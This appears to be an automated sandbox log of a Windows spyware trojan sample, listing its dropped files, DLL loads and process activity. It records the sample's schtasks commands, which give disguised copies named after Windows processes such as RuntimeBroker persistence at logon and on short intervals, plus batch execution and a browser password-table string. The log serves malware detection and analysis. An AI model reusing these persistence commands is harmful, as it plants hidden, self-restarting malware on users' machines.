                              Source: U1jaLbTw1f.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: U1jaLbTw1f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: mGDcgYSpPaqkzVyIrStmzarQirIs.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: UserOOBEBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.csCryptographic APIs: 'CreateDecryptor'
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.csCryptographic APIs: 'CreateDecryptor'
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.csCryptographic APIs: 'CreateDecryptor'
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@38/44@1/1
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Program Files\Windows Security\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\bGmawssa.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeMutant created: NULL
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-4vN0EXGexU6B21K1d7FI
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\AppData\Local\Temp\azC4YcApEzJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat"
                              Source: U1jaLbTw1f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: U1jaLbTw1f.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 7M8FYD4Jot.22.dr, jYorNtQzim.22.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: U1jaLbTw1f.exeVirustotal: Detection: 55%
                              Source: U1jaLbTw1f.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile read: C:\Users\user\Desktop\U1jaLbTw1f.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\U1jaLbTw1f.exe "C:\Users\user\Desktop\U1jaLbTw1f.exe"
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIs" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 5 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /f
                              Source: unknownProcess created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "U1jaLbTw1f" /sc ONLOGON /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Program Files\Windows Security\RuntimeBroker.exe "C:\Program Files\Windows Security\RuntimeBroker.exe"
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Program Files\Windows Security\RuntimeBroker.exe "C:\Program Files\Windows Security\RuntimeBroker.exe"
                              Source: unknownProcess created: C:\Windows\LiveKernelReports\UserOOBEBroker.exe C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Users\user\Desktop\U1jaLbTw1f.exe C:\Users\user\Desktop\U1jaLbTw1f.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\U1jaLbTw1f.exe C:\Users\user\Desktop\U1jaLbTw1f.exe
                              Source: unknownProcess created: C:\Windows\LiveKernelReports\UserOOBEBroker.exe C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                              Source: unknownProcess created: C:\Windows\LiveKernelReports\UserOOBEBroker.exe C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\U1jaLbTw1f.exe C:\Users\user\Desktop\U1jaLbTw1f.exe
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe "C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
